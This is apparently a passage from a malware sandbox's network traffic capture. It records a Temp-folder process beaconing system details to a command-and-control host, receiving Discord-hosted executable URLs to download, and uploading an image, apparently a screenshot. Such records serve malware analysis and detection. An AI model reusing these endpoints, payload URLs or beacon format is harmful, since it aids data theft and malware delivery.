3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:17.834796906 CET14413OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          299192.168.2.450125178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:17.841648102 CET14451OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:17.867914915 CET14453INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:17 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.449783178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:06.928394079 CET1149OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:06.958736897 CET1150INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:06 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 63 37 0d 0a 3c 63 3e 31 30 30 30 31 30 35 30 30 31 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 38 37 38 30 33 34 32 30 36 35 37 30 32 30 39 33 33 33 2f 39 30 38 38 31 30 38 38 37 34 31 37 31 37 36 30 38 34 2f 76 6d 73 2e 65 78 65 23 31 30 30 30 31 30 36 30 30 31 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 38 37 38 30 33 34 32 30 36 35 37 30 32 30 39 33 33 33 2f 39 30 38 38 31 30 38 38 36 35 36 31 35 33 34 30 34 32 2f 73 6c 68 6f 73 74 2e 65 78 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: c7<c>1000105001https://cdn.discordapp.com/attachments/878034206570209333/908810887417176084/vms.exe#1000106001https://cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe#<d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          30192.168.2.449814178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:26.729182959 CET3672OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:26.729413986 CET3672OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:26.729672909 CET3682OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:26.729911089 CET3685OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:26.752228975 CET3691OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:26.752279997 CET3701OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:26.752305031 CET3704OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:26.752315044 CET3706OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:26.752332926 CET3711OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:26.774825096 CET3716OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:26.774880886 CET3730OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:23:26.828059912 CET3782INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:26 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          300192.168.2.450126178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:18.013941050 CET14454OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:18.036340952 CET14455INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:18 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:18.036355019 CET14455INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          301192.168.2.450127178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:18.169370890 CET14456OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:18.195202112 CET14456INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:18 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          302192.168.2.450128178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:18.326132059 CET14457OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:18.352893114 CET14457INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:18 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          303192.168.2.450129178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:18.482834101 CET14458OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:18.507359028 CET14458INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:18 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          304192.168.2.450130178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:18.637799978 CET14459OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:18.664123058 CET14459INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:18 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          305192.168.2.450131178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:18.801804066 CET14460OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
